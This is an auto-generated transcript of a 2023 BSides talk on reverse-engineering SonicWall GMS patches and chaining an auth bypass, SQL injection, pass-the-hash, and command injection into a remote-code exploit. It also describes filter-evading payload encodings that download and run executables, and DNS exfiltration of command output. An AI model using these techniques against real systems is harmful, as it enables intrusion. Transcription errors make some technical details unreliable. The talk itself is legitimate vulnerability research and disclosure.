BSides PDX 2023 - From Patch to Shell: Twists & Turns of Exploiting a Hardened Platform (Ron Bowes)

[Music] yeah welcome to my talk and thanks for coming yeah I'll do a quick introduction of who I am and then I'll talk about what the talks me about and then I will give the talk so my name is Ron I work at rapid 7 um I have a Blog skull sec.org where I write all of CTF writeups and like tips of reverse engineering and exploit development and stuff like that the sort of the stuff that doesn't fit in with like our work blog and then there's my various Social Links um I work at rapid 7 I'm a a lead security researcher I run the CTF at bside San Francisco I don't think my co organizers are not here so I

can say I run it but really several it he's giving a talk downstairs right now and I organized a longc con which is wi pigs uh conference so we run that every second year usually this is one of the on years so we're just in the process of organizing that right now I also have two pet birds and sometimes I bought them on lots of slides but this time they're just on this Slide the uh the one on the left is claying like the compiler and the one on the right is sharp like CP because we there's they're green cheek Conor GCC see so this talk is about vulnerability research as I said I'm a lead researcher

at rapid 7 a lot of what I do it's kind of twofold part of it is taking end days which this is a vendor advisory and saying like what's this mean to us and to our customers and to the community and stuff and write about it the other half of it finding OD days and disclosing our own things which this is not about so this is going to be about Sonic wall posted a uh advisory saying there's 15 different cves in their GMS software what what do we do so it's our process of like how we read the how we read The Advisory what we think about what we look for um how we get the patch

how we analyze the patch how we kind of understand and contextualize the vulnerabilities um eventually how we write an exploit for it which goes in m plit and it currently is a m plit so what is vul research this is kind of a quick intro kind of boring work stuff but like my team does emergent threats emergent as an emergency things that we think are bad as as Citrix vulnerability or Outlook or like various things like that that we think that we think are going to exploit in the while basically Network Edge devices the big one this year is obviously manage file transfer mft stuff I've disclosed I think three different sets of vulnerabilities in

different manag file transfer stuff so it's kind of been a big deal to us this year especially and we try to help our customers and also non-customers everything I do wind the public we help people understand is this an emergency is this hype should you patch she take things offline what what's the deal with this vulnerability so when a bed phone comes out we kind of do three things if I boss Saw s should probably correct me and say there's a lot more to the process but we kind of try to get a Blog out quickly like within a few hours saying like here's what's going on here's what we know from The Advisory from the PC

that's published from whatever sources we have quickly and then we which means me and my co-workers Stephen we will like get a patch or test a PC or like kind of dig into what the vulnerability means is this a off bypass is this an overflow can we reproduce it are there like you there was one in junior PR last couple weeks ago where like explo go got published but when you exploit you end up in a sandbox like a BSD sandbox Which is less exciting and nobody really mentioned that so we kind of things like that caveats to the exploitation is what we want to talk about so in this case we'll talk about basically this whole

process for the Sonic qu vulnerabilities which again we didn't find this this was published and then we just went by the public report so it varies from every my watch buzzes I should not have this on it varies from uh I know Jeff will text me immediately if he knows that so every Project's a little bit different um we often have a vendor advisory saying like please install this patch we often have cve saying like there's a here this is an off by pass or this is such and such and we sometimes have old and new versions of the software this time we do we really want that sometimes a researcher publishes a Blog so one of

our competitors or some independent person will publish a Blog saying hey we hacked this and here's how and that's often a very good starting point for us rather than like ding patches sometimes you get detailed descriptions sometimes like the vendor advis you will call out like this endpoint is vulnerable and that's Narrows things down a lot they didn't this time and sometimes is a proof of concept some people po something on GitHub which we look at we don't necessar run untrusted expl GitHub for reasons I'm sure you're familiar with but we'll use that to especially if it's somebody reputable that we know we'll use those as a basis and write about it and we always give credit all

of our stuff is like very Community focused on my team at least so this is like this is the actual advisory and I know the text is kind of small and it's not a huge deal what it all says but like I just kind of made a little slide where I did animation and I kind of show the things that kind of mean something to us like the first line Sonic ball proactively Works to blah blah blah that's just lawyer talk but like what I think is interesting is the software GMS and analytics is a software have M cor don't I it was found by NCC groups that was found by like a uh researchers as

far as I know was during a pent test but I don't know that for sure it was disclosed to them as a COR of vulnerability disclosure so was like it was not exploited in the wild initially that we're aware of um and they they said it's critical which is important to us um they have a pirt which is good A lot of the vendors we work with just have a guy who takes vulnerabilities and fixes them and like this is all the kind of details that we want and this is what kind of goes into the blog that we write is like what can we extrapolate from this and something it's wrong um here's list of cve specifically um it doesn't

really matter which one's which we'll get to them as we go but the four I put them bold are the four we ended up using to write this exploit and what's interesting is I ordered these by CVSs score and like SQL injection was 9.8 that's important the off byth was 9.4 was important but the command injection which I think is the most important one is 8.8 because it's post authenticated and it turns out when it off bypass and post off stuff well and then the very last one the lowest one at pass a hash was actually a key component of our exploit so like it's kind of a nice way to show that like the high CVSs aren't always the

high risk things I'm sure the others are important as well we didn't necessarily find the others but we'll see some of them often the hardest part of these projects is actually getting the software and I actually want to thank sonic wall for having free free downloads for their stuff many companies put this behind a pay wall or only allow customers or whatever in which case it's much harder to do the stuff but Sonic ball was nice they let us download the software for free and also older versions which was phenomenally nice I promise some the wor shagans onto a slide and this is it so basically we we published a Blog my boss wrote this Caitlyn and we

published this I don't know a few hours after we started looking at it so this is like the basic information we we call it the four volumes that we thought were the most important which turns out they aren't but like what do we know and we sort of say like here's what we think is going to happen and stuff and as far as know this was never really exploited the wild meaningfully so like we predicted this would be exploited and it wasn't you never know so we're going to look at the patch because I think that's the most interesting part is what they fix and how did they fix it and there's I should say I it was on slide earlier I forgot

to mention that I'm going to put a link to these slides at the end I have lots of tiny little Links at the bottom of slides to show where to get things or where to get more information don't worry about writing them down or anything I will post this post the slides after so this is a little Montage of installing a software basically what I want to get across is that I installed two versions the top R is my VMware Fusion I install Windows pre patch Windows post patch Linux prepatch Linux post patch what's interesting is the Linux ones come as a service so an exe file that you install the the next one comes as an appliance with a login

screen and I actually never figured out how long into it I I never actually got past the lockin screen I got R shell on it but that's different I'm I'm sure I could have sped things up if I could log in but whatever also I had to post a screenshot where it says like firewall antivirus please turn off your firewall and Antivirus I love that software still does that so I install the software I run the software on Windows because I can access the OS and I say what's what port listen on and it says Tom Cat and I go H Java so I guess we're doing Java stuff everyone surprise so I get the files I copy them

from there to there I don't know why I made these slides I just like slides um so I grab all the jar files I realized this room is really big and there's a lot of small text so I actually have a uh another window where I have like a lot of stuff just in my uh browser or in my terminal so I'll probably flip back and forth but basically somebody once told me they like seeing this exact command because it shows how I do stuff so to like to reverse a Java project I start by grabbing all the the dod R files and there's usually hundreds I think in this case there's 222 of them and lots of

them are libraries and lots of them aren't stuff that we care about but if you want to actually understand how software works you often need the libraries because you'll see an encryption routine you'll look for it and then go that's a library from a posi or something so I just grab everything I use this fine command to grab everything called Do jar and stick it all one folder and then I go oh there's a lot of these so then I use a tool called CFR there's lots of java disassembly tools Java is great for disassembling unless it's skated which this wasn't thankfully um there's a jet beans make something that people use Jet Jet something

whatever um there's Jad X which is a great a gooey tool I like CFR it's simple I can use the commandline tool I can just run like CFR star dodr given output directory it just works I want the output from that and that's where I have this monitor I'm missing a right key on my keyboard cuz I bird ate it so I'm working without but but you get this huge list of files and like what's the best way to do it fine yeah I knew I read this before but you just get enormous amount of files and just like tons and tons and tons and tons and tons and tons and tons and tons of files and like this stuff

the t is interesting it be a stuff that's probably called the product name which is sonic wall so you'll see there's even under sonic wall there's I press the wrong button because I'm missing a key yeah you see a lot of lot of stuff so like that's our starting point so I do this for both the patched and the unpatched version um and then I use diff I'm sure there's lots of tools for different things different code for like vulnerability assessment I just use diff on the command line it's easy um 18,000 lines of diffs there's a lot of diff I have the file open right here go to the top yeah this this is

what the file looks like and it's just like pages and pages and pages and pages of diffs and some of these are important some of them aren't we'll uh we'll look through some of these I don't want to spend too much time showing code because it's kind of boring but I think it's also the important part so let's see I wrote down the line numbers for things uh all right so I'm just going to go through this and hopefully this is somewhat readable and kind of scroll through a bit so this is what I kind of ended up with I'm like okay here's a big diff of all the changes I made what stands out to me so scroll a little bit

scroll a little bit and pretty quickly you're going to see Tom Cat manager password equals C6 CC I didn't even call that on my slides because I think I I talk about that later um they added two Factor so a lot of the code they added is two Factor ra stuff so that's things we can ignore the next thing we see is another hardcode password so they changed from 2d26 blah blah blah to PG admin password presumably they changed from hardcode password to configured password and 2d26 looks like an encrypted string and if you scroll down a little bit I'm not sure if it's in this but there's a thing that decrypts the string so I did that

myself so I made a tool called decrypted Java and I couldn't actually get to work in like Java J in in my own like Ruby code or whatever so I just copied their code of a decompiler I think I have the uh I just copied their code this is just theirs I just added the main function but it's basically just the code from uh sing wall back to slideshow still loads good and yeah the password cryp say GMS ADM pound one and honestly this is a postest password but postest isn't actually running I assume it's some like module or something this end up being a really boring vulnerability so moved on so if I can

get to line 239 I know if I just scroll I'll probably find it but I wrote down things 239 we see CMD blah blah blah plus rex that sure looks like command injection and is so that's probably the command injection cve post authenticated command injection what's important I'm not sure if I can actually see it in this but it's in an endpoint it's in SL Appliance and SL Appliance is uh is going to matter later so okay that's shell injection what else is there scroll scroll wrong button still scroll scroll scroll more to of face scroll scroll looking for line 418 418 you see 18 character private key equals BL it's 18 characters not so

private so this this is um this is CV 2023 34123 predictable pass res key as far as I can tell this one's not super interesting cuz it only works if the box is unregistered so if it's like brand new so like kind of cool they fixed it but like not that exciting and we scroll some more this is line Seven Something scroll scroll scroll where is it 759 went too far 729 we see something called director veral check equals blah blah blah so like director traversal stuff that's probably CV 34125 post off vectory traversal and this goes on and on like I did this for two hours and copied everything looked interesting I think I have one more in my notes

which is 163 let go jump ahead to 1603 um as SEL Cory went from from concatenating strings to parameter I strings SQL injection so I kind of went through and found like dozens of instances of SQL injection hardcode Keys all these things it was just too much like too many volums for me which I've never said and like even at this point we're at 13% like we have a long way to go if we want to do it this way wrong button so like we Fon pulse off command injection that's probably what's going to get us a shell so let's kind of focus on that and see how we get from nothing to post off Comm injection several other

volumes were called off bypass volumes sounds good so I put together a plan and this plan is going to get more complicated as we go because the only gets more complicated as we go so going back to the diff I know where to find this from doing it but if we search from the bottom for the word o we see get o key with what looks like a uh secret I guess secret is the wrong word but what looks like a string of characters are kind of random but they held shift and pressed buttons on their number head so the question is where is this used is used in a file called MSW authenticator in a function called

authenticate h so the authenticate function takes a username a domain name and a hash and we'll see where those come from and then this line here calls get off key with the main name which I'll tell you is user controlled um and then this next parameter is a private key which is not private it's up here and that calls this function get off key which does hmax sh one I can do hmx sh one with that key so I did uh if you ever want look at these slides again I I screenshot all these things but it's a little bit bigger if I do it like live so I'm just doing that um yeah so I did

the same thing in Ruby so I made H Max sha one I I use a domain name or domain ID whatever they call it hello and then Bas 64 it that's another thing that was in here is B 64 and then say here's here's my token it's 6 UI blah blah blah blah blah so we'll come back to that in a minute uh next how is that used that is used in a function called tenant MSW authenticator authenticate and what we want to do is figure out how to do this ourselves so we have something called user two which is from a thing called prand map which sounds like something user can set it is and

then there's tenant ID which comes from the URL if we go to the very top of this and we'll see the ten ID comes from the URL MSW tenant ID so let's figure out where it was so tenant ID and username we get from parameters and then authenticate there it is and then hash is also from that PR map so we have three things we control going into aun functional private key that we also control so chances are high that we can actually bypass this off and make our own token and then it calls something called get domain info by tenant serial which we will come back to teased so I generate I generated a key

for this hello domain name and then use that/ hello as a domain user system there's a couple valid users hash is invalid and we get the error authentication fail due to invalid parameters if we look at this we will see that that's one of the error conditions we might get so good we found how to make this fail so if we can make this succeed using the hash regenerated we see tenant ID is not valid and sure enough the next error is tenant ID is not valid so good we can make this check pass we can bypass off on something called MSW which I don't know what that is but it's not useful so I bypass off on the web services

endpoint that can do a few things that don't matter it's like okay that was a waste of time but not really um this is really small but there is a um another CV hardcode tomat credentials that we saw at the very beginning of the thing which let us us view Local Host SL server service something I didn't write it down manager Local Host manager only works on Local Host and only works with the hardc creds barely matters they fix this it's a tve but what I found out on this was there's four different endpoints um SL Appliance SL manager SL sgms can't read this and SL WS we bypass off onws websockets web services something we actually want

Appliance Appliance is where the shell injection was so like well we're in the wrong place on these different Services as far as tomcat's concerned these are entirely different Services different cookies different logins different offs different everything what they do share is a database and one of the things we talked about was SQL injection so let's find SQL injection um this was like a little bit hard because they fixed every SQL query in entire software stack they switched to parameterized queries which is great that's what they should do but it also means I'm not sure which ones are actually accessible by us they didn't just fix the ones that that attackers can use so um I teased earlier oops I'll

learn the right button eventually I swear the get the main info by tant serial function let's look at that um here's concatenate select star from table where serial. append tenant serial which I control all right SQL injection that was easy so yeah a pretty typical SQL injection query and like to be pedantic this is an authenticated SQL query because we use the O bypass there's almost certainly ways to do this without the O bypass I didn't find them so this is what we used in our exploit so we can use the uh that squ action to pull out anything from the database including passwords so I made a queries that select ID concatenate with password from users where is remain

equals 1 and then I get the username admin and the password 5 f4d which nerds here might recognize um I put that into the most advanced password hecken tool I have Google thank you and that's the md5 for password cool and that's to be fair that's my password I use that password to create the hash that's not their fault that's mine it's also a default password but they make you change it I just changed it back to password because I didn't want remember something so we have a we have a username and we have an admin password hash we can crack a hash but if they used a decent password unlike me it's going to be hard to crack a hash or at

least it's not going to be easy to crack a hash necessarily it's raw md5 which is about as easy as I get but it's still not trivial I don't want to have to crack hashes in M module so what do I do well the another vulnerability release was called client side hashing function allows P the hash that sounds good what's P the hash anyone who does Windows stuff we'll recognize this as a like famously famous thing on Windows uh basically a p has let you authenticate with a hash rather than with the password so if you know the hash you can authenticate we have a hash cool let's see if we can find the pass the hash

thing um this is where I stopped looking at the diff because the diff was too long I didn't really know what to look for and I just logged into Sasha appliance using my username and password um so I logged in as admin which this is a output from burp Suite the username is somewhere or not oh yeah Appliance user equals admin so I'm logging as admin and it has password equals 5f4 DCC that's the md5 and that's actually ignored it doesn't actually use that field at all and I think it's supposed to be sensoring the field and not which is a different story and then you see client hash equals BD 3A at the bottom there

that's the hash that's actually valid valed if I like intercept this in burp suite and change that you the login fails so I knew from that that that was the actual thing Ed for logins so what happened so where's that value come from yeah and I should say if I changed the password hash for 5f 4D stuff nothing changed like it still worked so it's clear that wasn't being used so this is Javascript code now we're going from java to JavaScript uh this is what runs in the browser so you'll see a thing called Cent hash client has. Val equals get password hash document. login. password. which is a value you typed in so that's the word

password and it passes a number in this one it's 6066 094 blah blah blah blah that changes every reload and that is apparently St in your session because if you use the wrong one it fails so that's going to be like a seed value or something just like ntlm on the network does that sort of thing and then the actual get passw has function basically it takes the pass Ries which which is the word password and random number which I think is supposed be random number um it takes those two parameters and it just calculates the md5 at pass phrase which we know that that's the value we just stole from database like three slides

ago four five whatever lots of slides ago and then it sets internal page hash to the md5 of the random number which is a 6066 value concatenate with with the md5 passphrase so we can calculate s internal page hash there without ever knowing the password all we need is the hash to calculate that and that is the CV 34132 client side hashing so that means that if we get the password from the database we can now use that password to log in to the Appliance thing getting close this is what we're looking for and I should mention too this is days of work like this has me chasing down false leads all these different things so I put this I

put the has to Hash in the Ruby all this code available there's links somewhere but this is all just from uh this exploit shell injection. RB so if you ever want to see this actual code all at once it's available back to slideshow yeah so we can use pass the hash and authenticate so now this is where I'm really sad my friend David he's pres presenting downstairs right now in the workshops because this is the thing he made F before way in the past when we worked together but there's this function um if so this is on the path to the um shell command injection that we saw from like the web Handler um basically it does is if app pliancy tail

dot is Windows print this operation is not supported on Windows and then redirect you to uh failure D ASP what it doesn't do is stop

executing so all the code below does run it redirects a browser but the code runs I missed this I've missed this like 10 different times on different things and David has made fun me for it every single time and I've written a CTF challenge that could be bypassed with this vulnerability because I keep on bringing it it's like my blind spot is I can't see like forgets to return and like that's not a super common V type really but any case it's just a little aside that like there's an error check that doesn't actually do anything so that brings us to the Shell injection um I think I've opened this one too so basically the shell command injection we

saw this in the um in the diff earlier but this is the actual function with the can injection if you trace backwards you can get the path from like the web serlet Handler thing to this pretty cleanly it's just a bunch of function calls that are pretty obvious so like there's nothing once you bypass off there's nothing terribly difficult getting this extra step but you'll see what's funny is they have is Windows so like they handle Windows even though they say it doesn't work on Windows so I'm not really sure what's going on there but they basically do a few checks like is a search folder valid and stuff like that and then they just concatenate

your command with CMD SL whatever or bsh whatever so basically on Linux you can Linux and windows you can both inject commands in different ways and then yeah not not too much to say on that it's a pretty typical shell injection you can use pipes or semicolons or end or whatever to just inject your own command and this is kind of what the exploit looks like and this is sort of the end point of the easy part of the exploit or the direct part things get a little complicated afterwards and you can see the windows and Linux versions are pretty much the same except for a path and like unfortunately a path has to be

right otherwise it will complain and not run which is unfortunate but yeah this is 34127 post off command injection so like are we done I can run notepad we're basically done um it's not true but we can create a token I think I have a summary here yeah so we can use an off bypass to forge ourselves a token we can use that token to use seqo injection to get passer hash use password hash to authenticate to the Appliance endpoint ignore Windows error and then Shel command injection run a code and we can run noed if you can see at the bottom there so good um I thought we were done um we posted iner QB right up this is

one of the outputs my team does this is tiny but it's linked at the bottom also tiny but again slides available yeah we said we're done we can run noed happy happy then I went to write a m module and that's where we got complicated again server has very aggressive filtering on those things notepad.exe turns out to be fine and in fact pipe notepad.exe turned out to be fine we're not this isn't shell command filtering this is cross scripting filtering and some other things so we had to do well-formed HDML as well as command injection so figuring out how to actually take this command injection and make a generic exploit where you can run anything with it was actually kind of a

uh complicated process so we'll talk about how we do this on Windows and on Linux so our uh new goal how do we code any command running notepad is cool and seeing notepad run at systems cool but I mentioned at the beginning of this talk a lot of times a someone like me a researcher will get to a point whether it's being in a sandbox whether it's being like behind a filter being something where they're like this is really cool we got this proof of concept to work oh but it can only do it can run noad great I care noad so like we wanted to take this one step further and say how how would attacker use this to do

any command so this took some fussing this took different encoding schemes different weird stuff but eventually we figured it out on both platforms and I'll show a couple of the pths we took But ultimately how it actually worked so this is my coworker Spencer he um he's on the M team he does uh really cool stuff he WR a really good exploit for AC Citrix thing a few like a month ago fun to watch him actually do that kind of stuff so my first attempt was base 64 Powershell can run base 64 code pretty easily Powershell the E exe D enod command equals B 64 stuff that's the um that's the easiest thing to do the problem is we can't use

a plus character the plus character gets blocked by their cross descripting filter and Bas C4 needs pluses that's just part of the spec so we thought what if we take what if we do the URL safe basics 4 Ur safe Bas 64 replaces pluses with hyphens and slashes with something underscores that might be backwards and those are all allowed we can use hyphens underscores and every letter works great it's like oh cool that command works we have a workable module until I realized there was no pluses or hyphens or underscores or anything in there so like after a day of trying to figure out how to make this into a MPL module we realized that we

just got lucky and there was no bad characters in there so turns you can't use your p64 so here's what we did use this is like this worked it's not pretty but it worked I think Jeff actually helped me with some of this developing like this poers shell uh nonsense but basically we just encode a series of integers and those Decode by Powershell into like a curl a file and run the file M calls these fetch payloads but basically download and run EXE not the cleanest but it kind of works so that's the man module as it stands this is how the windows uh bypass works then Linux surely Linux is easier Linux has like a more powerful shell I

would argue Jeff might disagree Linux has a richer a richer command line more utilities scripting is simpler there's no power shell um Linux was actually harder if you remember the very beginning I said I don't have access to the box I never got log in for it that was part of the problem I didn't have sh access I maybe could have gotten sh access if I tried I didn't I'm sure I could have just grabbed the shadow file and changed it if I wanted to but that's no fun U the suite of caties is Tiny it's an appliance and it runs busy box but the busy box they compiled only has like the stuff that they need there's no b64 no

xxd no pearl no Ruby um they have a python install that doesn't work and maybe you can make it work it might need a home directory it didn't work I don't know how work python but it had almost nothing also had opaque error messages I could run a command but I couldn't see the output from it so like I don't know and then you aren't low of Quotes no single quotes no double Quotes no dollar time brackets and no um back ticks those are all forbidden so how do you even analyze the Box how do you start exploring so what I'm faced with something like this where I have command injection but not sure how to exploit it

first thing I think of is DNS DNS always works and this is a bit of an aside because this was the wrong solution but it worked kind of so I did who am I and I piped into that that little um thing there with the squiggly brackets and read blah blah that just reads the up play the command into a into a variable on sh this is also sh not bash which is another problem but it reads that variable into new test and then pings new test at skull cs.org I couldn't have done a whole talk on how this thing works but skull cs.org is a domain that I own and it every request for that

domain goes to me so therefore somebody pings abc123 that's scs.org I will see D request for that and respond with an error but I'll see that it happened so on the bottom you can see the output from my tool I wrote called DNS logger and if you ping the result from who am I scs.org it does a paying for root the.org which tells me the output of who am I is root so you might wonder what else I can do with Dess did you know you can do slashes in DNS I didn't because it crashes by Tool but I can do which which ping and then ping which ping scs.org and they'll get a ping request forbin pings this is

going through DNS like somebody at like who runs DNS is like what slash but it works until you get to my software that crashes anyway so you can use which ping and see that this ping there so I spent like a half day doing like DNS Shenanigans and it was fun but like I realized you can read log files off the machine so I realized later I could just LS pipe it into a log file and then download the log file so this is the way actually like DNS was fun and it I'm like well thises make a good talk but it doesn't cuz that was not the right way but so that's the output of like the ls

command and I write a bunch of commands this way to kind of explore the system figure out what I have access to figure what tools exist I realized way later that this runs in Java so I clearly have access to Java somewhere on the file system but thankfully I didn't remember that and didn't have to write Java someone afterward like why did you use a Java shell I'm like oh this output doesn't matter this is all the this is a big list of commands that are available and basically I said okay which of these like there's B unzip could that be used to Stage something there's grip there's md5 some can make and there's lots of stuff and what I end

up settling on was uu incode and uu decode the yuu incode decode is like an old mime thing that is still B 64 but like B 64 requires plus characters plus characters aren't allowed but this is Linux I can do this so there's the payload um I think I even Yeah so basically this runs bash it makes a variable called plus that uses base 64 f plus to set the plus variable and you have to do a bunch of special formatting they like begin dbas 64755 equals equals equals equals nonsense that's all part of uu and codes format there might be better ways to do this I this is what worked for me um so

it basically uses U code to get a plus sign into a variable and then another U code with a variable sort of embedded to uh bypass that filter and this works this bypasses the filter it it basically writes to a file and then runs the file just like Windows it uses coproc which is I think I never heard of until that this project to run it in the background so it doesn't actually like hang the server and then it removes the file and Linux is cool because you can remove the file while it's running and it'll just keep running because magic yeah this ends up working and this is getting kind of close to the

end I think I might had a schedule which I thought I'd be behind schedule by now let's see so here's here's a m module I end up writing so this is public this is in the M repository now it was actually handy windows and Linux had different um titles so I was able to distinguish which one's which based on the title which was kind of cool the secret key which came from the um the file that we saw basically this is all metadata nonsense um being able to set the U being being able to set the directory stuff like that it's not terribly exciting stuff um there's a check function the check function just basically validates the

software is running we we there's no version check that that could find so we just verify that software is running or not running the end and then get password hash this uses that SQL injection we saw it's a union select we need the ID from the domain so it selects the ID that's just part of the query these fields don't matter and this is where we concatenate the username password we saw this earlier and then we make a token this is that other thing we saw where we could Forge a token using that uh secret secret the not secret secret key from earlier and then yeah we we use that to get to get the username password um that

all works Sandy check s checks yeah basically we get the password Here found an account I can't actually run this because the server is not running on my laptop but then using that token we authenticate um this the thing we saw earlier it grabs that hashing token from the page uses pass a hash to create our own token blah blah blah and then eventually we execute either the Windows command this is how we generate the Powershell command from earlier or the Linux command which is have a big explanation of why I did this nonsense but this is actually the Linux command before it's all escaped so it's actually a lot prettier you see it it

sets the plus sign it um uses the plus sign as part of the encoding BL yeah this is what it does and these both run quite stably um no real problems there anything else no that's the last uh of that so yeah on Windows we use integers on Linux we use U en code both what's really cool about both is you can encode any command you can imagine so like both of them can run any any remote command um this is the output on Windows I know it's tiny doesn't really matter but that's what the M module looks like when it runs this is what it looks like on Linux and uh yeah so this this all in all was

a twoe project summarized in 38 minutes oops um for this project like I said we had a patch and advisory and not much else there's been times we've had a lot less there's been times we had a lot more um I guess since I'm early I'll just mention that my blog skull sec.org CV if you're curious about the um the stuff I've done everything I've worked on at rapid 7 and otherwise is on here links to all my analyses vulnerabilities I discovered vulnerabilties analyzed lots of junk going back to my old like Starcraft hacking days from 2009 yeah feel free to uh check that out what's kind of cool is that while I was doing this another company called grey

noise launched a tool called sift and the very first example in the tweet from the CEO and everything I saw the get is a get request that look like seq jaction for WS msw1 Union like oh that's my exploit so I guess since this was released people are actually scanning for it so if you run something called GMS or analytics should probably make sure you're patched yeah this is my contact info that QR code will lead you to the slides that tiny ra at the bottom will lead you to the slides probably um my email Masson Twitter still up it's old joke um Blue Sky I have tons of stuff so feel free to take a picture or use a QR code

and yeah we have time for questions [Applause] yeah every everything in here is public the slides are public the explo is public the proof of concept is in my repo that is where is it here at callic boom my boss had not to use the name of the actual product so I make stupid names for my repos but yeah feel free to grab this awesome talk thank you another [Laughter] question any secrets for finding old versions of software the is there's the question for the uh yeah of course the question for the stream I haven't talked before Jeff um how do you find old versions of software if the vendor doesn't publish them it's hard um

we have a a directory on Google Drive at work called vulnerable software which has every time you work on anything we put it there so we have like hundreds of gigs of old versions of software um looking for FTP servers like FTP company.com can work um URL hacking so if you download like Sonic called GMS 1.2.3 try 1.2.2 that often Works um vendor some vendors do give you access to their software like Googling things in front of a crowd yeah my Sonic is a site for sonic wall and they actually made it really easy which I was very impressed at yeah there's a button called sign up on their page when you click sign up

there's a button called free downloads and the free downloads I don't know if to load I'm Ted to my phone for Wi-Fi I'm clicking the wrong thing that's why just has like what version do you want like thank you this is so beautiful I wish every and like honestly it's inventor's best interest to let researchers have their stuff and it's like there's this big thing this week wsftp their vendor pulled their free download because people were writing exploits and like the the expit are written like it's too late but what can you do yeah sometimes like there's there's a loose community of people who do this stuff and if I see like company X who I know people at develop the

initial exploit I can text my friend and say like hey do you have the software and like it's all very great Marky stuff but we don't usually register it like usually installing not registering is enough I've heard some people use a cheat code of pyal intelligence cuz somebody's uploaded all the installers for whatever reason yeah if if as Jeff said if you have um like a sha one or a file name or something you can often get it from virus total there's yeah I think there could be a whole talk in how to get the software and like sometimes that's half the project is getting the software honestly yes uh how long did it take you

to do this whole process start finish how long it take you just on average so the question is how long did it take you to take me from start to finish at this process this one was about about two weeks and there were two of us working on it for a lot of that so it took two people about two weeks to get from beginning to end the first getting the blog out is a few hours getting the um PC running of stuff is usually like a week maybe two weeks and then M module if we have time and it makes a good module another couple days usually we also pass out the man module

to their team because we're my manager manages me and the Man team but we're not the man play team so like it sometimes we write it sometimes we let them write it sometimes you don't write it it it all really depends um yeah it sometimes like move it back in like early this year that took like a good three weeks or something move it was a pain and that was actually a thing I want to mention when I was talking about like diffing the patches like this patch diff was 17,897 lines move it patch diff was like 20 lines and it took me way longer to develop an X play for move it because it was super unclear the changes

they made compared to being able to run code it made no sense how to get from one to the other so it took like even a lot of good people took weeks to get that out so like it can be that complex sometimes go anywhere was a manage file transfer from early this year and from a vendor advisory that just said this endpoint is vulnerable two code injection or two code running was like half a day like it was it said this endpoint is vulnerable I looked at the endpoint and it said DC realize this post request I'm like oh so I use yo cereal generate a malicious Ser object do the post get code so like it really

varies sometimes it's simple sometimes it's complicated you just never know another question big question is does this job say interesting or do I get bored to tears both I I appreciate there's a lot of variety and there's like a lot of pros and cons about about these things the variety is that like when there's a bad vulnerability we'll spend like drop everything spend a day week two weeks working on this new thing and there's a lot of like some adrenaline our competitors are working on these we're working on these there's like information being slowly coming out you're like solving a mystery like what's this code do like why are you making this change to the like Local

Host only code even though there's no Local Host only component which was move it like it's it's a mystery solve and a puzzle solve and it's really cool and then when there's no like ETR burning no emergent threat that we're worried about we're doing OD research which is often like very self-directed software we think is important which for me this year has been file transfer grabb the software at more or less my own pace like take it apart figure out what the vulnerabilities are find some zero days report them to the vendor argue with the vendor disclose things it's it's like it's very self-directed so I get to working what I think's interested my cooworker Stephen has been working on

like ponent own stuff which is like a whole different thing it's more more embedded and stuff like that so like it stays I think the variety keeps it interesting it's certainly tedious sometimes um when you're kind of spend especially when you have like 18,000 lines to go through it's like when's this going to end but like I think it's really neat that in addition to like doing the actual technical stuff and reversing all that I then get to like write a blog about it I love writing I have my own blog I have my rapid s blog um I get to write about it I get to do talks about it I love like how can I

take this like two weeks of banging my head and make this into like something interesting that others can learn from you know make make some jokes show some like code and that and like being able to do a bunch of different things I do I do like a highle Blog a lowle attacker KB I do like a mixed talk I think it's the best that I get to like do a huge variety of stuff um I also really appreciate that my team at rapid 7 they know that we're Deep dive research and they don't give us strict timelines it's kind of like if I feel like I'm going to make progress I can keep going until I

don't think I can make progress and there's been times you given up and usually just after giving up is when I find the actual vulnerability which that was Citrix something something last year it's like okay I spend two weeks on this I'm just going to look at what ports are open and then call it and then a day later I had an OD day but like they give us the time we need and like a lot of companies especially like 2023 and everything going on don't give you the time you need so I really appreciate that like if we think we can get a good output we were generally given the slack and the time to actually create the output and

like even ring a talk like my boss gave me time at work to write this talk and time off work wait it's Saturday but in theory in theory time off work to give this talk um which again like having great management and like a great boss and stuff has makes this good this could easily be tedious if I was like being rushed like you have one day to write this analysis that'd be much worse yeah the question is what's the ratio of when we get to read the code and when that's a binary um Enterprise stuff is largely Java and decompiles pretty cleanly so so I I think do I still have my my uh CV

open yeah so like this year stuff I discovered so unit at the universe that was a binary that was like a Linux executable that was really neat that was like reversing a protocol um Global Escape was JV no that was C++ so that's two uh jscape that was distalization that was Java so two binary one just one code and then of all the end analyses going anywhere with Java managing was ja was done I think or Java I forget uh fast PEX that was Ruby which was really strange I didn't know anyone wrote Things in Ruby besides me um aachi thing I don't even remember what this was um move it was this waset and also

something else yeah there was a low level end on that stuff so this was both um VMware I think was Java Citrix um that Citrix was a uh binary so I obviously um the the sonic wall thing we just looked at was Java and then Juniper jweb I this like a month less than a month ago I forget what it was I would say about 50/50 is what it sounds like just from complete guess I think this one was also I don't know I'm not sure I actually reverse this one I think I just see somebody else's exploit and wrote about it yeah I'd say about half and half between like Lowel and high level code I feel

like the Enterprise stuff typically Trends towards High LEL stuff like net and Java I typically Trend towards lowle stuff I like prol parsers um one my favorite projects was that one I just talked about the um un dat un stuff because I implemented their whole protocol and it was it was complicated like it was a lot to it but like reverse implemented their entire protocol and found off bypasses and overflows and all kinds of stuff that's what I like I like working at uh I like using a debugger I like understanding a bunch of like ridiculous assembly code but realistically most vulnerabilities that come out aren't in this level of code most vulnerabilities are talization

these days but are in like java.net code and I think part of that too is like mitigations it's much harder to write exploits for C code these days because compilers add like stack canaries and the the just the various different like nonexecutable stacks and all these things make things it's much much harder unless it's Citrix in which case you can run C off the stack still that was Citrix that was uh where's Citrix go down no up yeah this one was literally run cat off the stack level of vulnerability it was unbelievable I I don't think I've ever written expl my professional career except in CTF where we could run code off the stack except for this one

so yeah this was neat I also got to pair up on this one usually there's two of us on my team one of us is European and I'm uh I'm Canadian but I live here so like we don't get much overlap but this one I actually had to work with a cooworker and that was pretty fun being able to like go back and forth yeah um something people always ask me is is there is there RSS for techb and the answer is no which is upsetting I wish there was we do there is I put it in my somewhere we have an RSS link for our um blogs but it's not actually published anywhere so somewhere I have secret

[Music] r